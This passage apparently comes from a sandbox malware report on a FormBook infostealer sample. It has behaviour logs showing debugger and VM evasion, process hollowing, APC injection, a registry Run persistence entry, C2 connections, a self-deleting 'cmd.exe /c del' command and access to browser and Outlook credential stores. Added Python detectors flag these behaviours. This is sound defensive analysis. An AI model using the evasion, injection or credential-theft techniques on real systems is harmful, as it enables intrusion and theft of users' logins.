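#   reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion cv.reg
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"JNUDV4J0C"="C:\\Program Files\\Modpl\\winb2k.exe"
'''


def parse_reg_export(text):
    """Yield (key, value_name, data) for every string value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if m and key:
            # .reg files escape backslashes and double quotes inside strings.
            data = m.group("data").replace("\\\\", "\\").replace('\\"', '"')
            yield key, m.group("name"), data


def find_suspicious_autoruns(text):
    """Return autostart entries worth triage, each with the reasons it was flagged."""
    findings = []
    for key, name, data in parse_reg_export(text):
        kind = AUTORUN_KEYS.get(key)
        if kind is None:
            continue
        reasons = []
        if kind == "undocumented":
            reasons.append("policies-explorer-run")
        if GENERATED_NAME_RE.match(name):
            reasons.append("generated-value-name")
        if reasons:
            # The image path is kept so the analyst can pivot to the dropped file.
            findings.append({"key": key, "value": name, "image": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_autoruns(SAMPLE_EXPORT):
        print(f"{f['value']} -> {f['image']}  [{', '.join(f['reasons'])}]")
```

reg.exe writes exports as UTF-16 LE, so open a real file with encoding="utf-16" before handing its text to find_suspicious_autoruns; on this sample's host the Policies\Explorer\Run entry would come back flagged on both counts, while the documented Run entry is ignored because neither heuristic fires on it.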

      Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | RDTSC instruction interceptor: First address: 000DBC3C second address: 000DBC42 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | RDTSC instruction interceptor: First address: 000DBEA6 second address: 000DBEAC instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\System32\cmd.exe | RDTSC instruction interceptor: First address: 00067244 second address: 0006724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\System32\cmd.exe | RDTSC instruction interceptor: First address: 000674AE second address: 000674B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_0244018E rdtsc
      Source: C:\Program Files\Modpl\winb2k.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_9-3763)
      Source: C:\Windows\explorer.exe TID: 3908 | Thread sleep count: 33 > 30
      Source: C:\Windows\explorer.exe TID: 3908 | Thread sleep time: -66000s >= -30000s
      Source: C:\Windows\System32\cmd.exe TID: 3872 | Thread sleep time: -65000s >= -30000s
      Source: C:\Windows\System32\cmd.exe TID: 4008 | Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\System32\cmd.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | API call chain: ExitProcess graph end node (graph_0-48209)
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Process information queried: ProcessInformation

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | System information queried: KernelDebuggerInformation
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Process queried: DebugPort
      Source: C:\Windows\System32\cmd.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_0244018E rdtsc
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_01371B28 IsDebuggerPresent
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_0137463A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_023B6B80 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_0137221F GetProcessHeap
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Process token adjusted: Debug
      Source: C:\Windows\System32\cmd.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_013730DB SetUnhandledExceptionFilter
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_013730FE SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files\Modpl\winb2k.exe | Code function: 9_2_00E530DB SetUnhandledExceptionFilter
      Source: C:\Program Files\Modpl\winb2k.exe | Code function: 9_2_00E530FE SetUnhandledExceptionFilter,UnhandledExceptionFilter

      HIPS / PFW / Operating System Protection Evasion:

      Benign windows process drops PE files
      Source: C:\Windows\explorer.exe | File created: winb2k.exe.2.dr
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Network Connect: 202.208.204.153 80
      Source: C:\Windows\explorer.exe | Network Connect: 35.242.251.130 80
      Source: C:\Windows\explorer.exe | Network Connect: 104.17.201.73 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
      Source: C:\Windows\System32\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\System32\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\System32\cmd.exe | Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
      Source: C:\Windows\System32\cmd.exe | Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Source: C:\Windows\System32\cmd.exe | Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Thread register set: target process: 1216
      Source: C:\Windows\System32\cmd.exe | Thread register set: target process: 1216
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Section unmapped: C:\Windows\System32\cmd.exe base address: 4A1C0000
      Source: C:\Windows\System32\cmd.exe | Section unmapped: C:\Program Files\Mozilla Firefox\firefox.exe base address: 11F0000
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.689518588.0087D000.00000004.00000020.sdmp | Binary or memory string: ProgmanpD
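Read together, the rows in this section describe one chain: the sample queues an APC into explorer.exe and hollows a cmd.exe (section unmapped at its 4A1C0000 image base), that cmd.exe hollows firefox.exe, and it is the injected explorer.exe, not the sample, that carries the HTTP traffic, spawns the dropped winb2k.exe and deletes the original file through cmd.exe /c del. Correlating injector, target and later activity is how the "System process connects to network" verdict is reached. The Python below is an added example, not Joe Sandbox or FormBook code: it parses constructed rows written in the report's own "Source: ..." style (paths, base addresses and hosts are the ones listed above) and rebuilds the injection chains, the connections made by injected system images, the self-deletion command and the child spawned from the injected explorer.exe. The SYSTEM_IMAGES set is an assumption.

```python
r"""Correlate sandbox behaviour rows into process-injection chains.

Added example for this report, not Joe Sandbox or FormBook code. The rows are
constructed in the style of the report's "Source: ..." lines; paths, base
addresses and C2 hosts are the ones the report lists.
"""
import re

SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\ScanRFQ_569585.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\Desktop\ScanRFQ_569585.exe Section unmapped: C:\Windows\System32\cmd.exe base address: 4A1C0000",
    r"Source: C:\Windows\System32\cmd.exe Section unmapped: C:\Program Files\Mozilla Firefox\firefox.exe base address: 11F0000",
    r"Source: C:\Windows\explorer.exe Network Connect: 202.208.204.153 80",
    r"Source: C:\Windows\explorer.exe Network Connect: 35.242.251.130 80",
    r"Source: C:\Windows\explorer.exe Network Connect: 104.17.201.73 80",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'",
    r"Source: C:\Windows\explorer.exe Process created: C:\Program Files\Modpl\winb2k.exe C:\Program Files\Modpl\winb2k.exe",
]

# Image paths may contain spaces ("Program Files"), so the source column is
# matched up to the first ".exe" followed by a space rather than up to a space.
SRC = r"^Source: (?P<src>.+?\.exe) "
INJECT_RE = re.compile(SRC + r"(?:Thread APC queued: target process: |Section unmapped: )(?P<target>.+?\.exe)\b")
NET_RE = re.compile(SRC + r"Network Connect: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<port>\d+)$")
PROC_RE = re.compile(SRC + r"Process created: (?P<cmdline>.+)$")
DEL_RE = re.compile(r"cmd\.exe /c del '(?P<path>[^']+)'", re.IGNORECASE)

# Assumption: images that do not originate C2 traffic on a clean host, so a
# connection from one of them after it was injected into is the signal.
SYSTEM_IMAGES = {"explorer.exe", "cmd.exe", "svchost.exe", "autochk.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(rows):
    """Turn report rows into typed events keyed on image basenames."""
    events = []
    for row in rows:
        if m := INJECT_RE.match(row):
            events.append({"kind": "inject", "src": basename(m["src"]), "target": basename(m["target"])})
        elif m := NET_RE.match(row):
            events.append({"kind": "net", "src": basename(m["src"]), "dst": f"{m['ip']}:{m['port']}"})
        elif m := PROC_RE.match(row):
            events.append({"kind": "proc", "src": basename(m["src"]), "cmdline": m["cmdline"]})
    return events


def injection_chains(events):
    """Map each injected image to the chain of injectors leading to it, root first."""
    injector = {}
    for ev in events:
        if ev["kind"] == "inject":
            injector.setdefault(ev["target"], ev["src"])

    def chain(image):
        out, seen = [image], {image}
        while out[-1] in injector and injector[out[-1]] not in seen:
            out.append(injector[out[-1]])
            seen.add(out[-1])
        return out[::-1]

    return {target: chain(target) for target in injector}


def network_from_injected(events, chains):
    """Connections made by a system image that an earlier row injected into."""
    return [{"chain": chains[ev["src"]], "dst": ev["dst"]}
            for ev in events
            if ev["kind"] == "net" and ev["src"] in chains and ev["src"] in SYSTEM_IMAGES]


def self_deletions(events, chains):
    """Sample files removed with cmd.exe /c del, issued from an injected process."""
    hits = []
    for ev in events:
        if ev["kind"] == "proc" and ev["src"] in chains:
            m = DEL_RE.search(ev["cmdline"])
            if m:
                hits.append({"by": chains[ev["src"]], "deleted": basename(m["path"])})
    return hits


def spawned_by_injected(events, chains):
    """Children launched by an injected image, excluding the /c del helper."""
    return [{"parent": chains[ev["src"]], "cmdline": ev["cmdline"]}
            for ev in events
            if ev["kind"] == "proc" and ev["src"] in chains and not DEL_RE.search(ev["cmdline"])]


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    ch = injection_chains(evs)
    for c in ch.values():
        print("injection chain:", " -> ".join(c))
    for h in network_from_injected(evs, ch):
        print("C2 via injected host:", " -> ".join(h["chain"]), "->", h["dst"])
    for d in self_deletions(evs, ch):
        print("self-deletion of", d["deleted"], "by", " -> ".join(d["by"]))
    for s in spawned_by_injected(evs, ch):
        print("child of injected image:", s["cmdline"])
```

Matching is on image basename, which is all the report rows carry, so the two cmd.exe instances (the hollowed one and the /c del helper) collapse into one node; with EDR or Sysmon telemetry key the same logic on process GUID or PID instead, and the "Thread register set: target process: 1216" rows, which name a PID rather than a path, then resolve too.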

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_013763D5 cpuid
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_01372ECE GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
      Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Tries to steal Mail credentials (via file access)
      Source: C:\Windows\System32\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
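The evidence behind both stealer signatures is simply which process opened which object: the hollowed cmd.exe reads the Chrome and Opera "Login Data" SQLite files (the winsqlite3.dll and mozglue.dll loads listed earlier are the same stealer getting ready to parse them) and the Outlook profile keys. A small owner table turns that into a host-side check that fires on any non-owner image. The Python below is an added example, not Joe Sandbox or FormBook code; the rows are constructed in the report's "File opened" / "Key opened" style from the objects listed above plus one benign control of chrome.exe reading its own store, and the owner mapping is an assumption.

```python
r"""Flag credential-store access by a process other than the store's owner.

Added example for this report, not Joe Sandbox or FormBook code. The rows are
constructed in the report's "File opened" / "Key opened" style from the
objects it lists, plus two controls; the owner table is an assumption.
"""
import re

# Credential stores this report shows cmd.exe touching, and the image that
# normally opens each one (assumed for illustration).
STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\.*\\Login Data$", re.I), {"chrome.exe"}, "Chrome saved logins"),
    (re.compile(r"\\Opera Software\\Opera Stable\\Login Data$", re.I), {"opera.exe"}, "Opera saved logins"),
    (re.compile(r"\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Profiles\\", re.I), {"outlook.exe"}, "Outlook profile (Office)"),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I), {"outlook.exe"}, "Outlook profile (WMS)"),
]

ROW_RE = re.compile(r"^Source: (?P<src>.+?\.exe) (?P<op>File opened|Key opened): (?P<obj>.+)$")

SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data",
    r"Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\System32\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook",
    r"Source: C:\Windows\System32\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook",
    # constructed benign control: the browser opening its own store
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    # constructed control: a file that is not a credential store must not be flagged
    r"Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\drivers\etc\hosts",
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def credential_access(rows):
    """Rows where an image outside the owner set opens a known credential store."""
    findings = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        image = basename(m["src"])
        for pattern, owners, label in STORES:
            if pattern.search(m["obj"]) and image not in owners:
                findings.append({"image": image, "op": m["op"], "store": label, "object": m["obj"]})
                break
    return findings


def images_touching_stores(rows):
    """Distinct offending images: the pivot to take into the process tree."""
    return sorted({f["image"] for f in credential_access(rows)})


if __name__ == "__main__":
    for f in credential_access(SAMPLE_ROWS):
        print(f"{f['image']} {f['op']} {f['store']}: {f['object']}")
```

On this report the only offending image is cmd.exe, which on its own looks like a shell helper; joined with the hollowing rows in the previous section it is the FormBook stealer running inside a hollowed system binary, which is why the two signatures are assessed together rather than in isolation.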

      Remote Access Functionality:
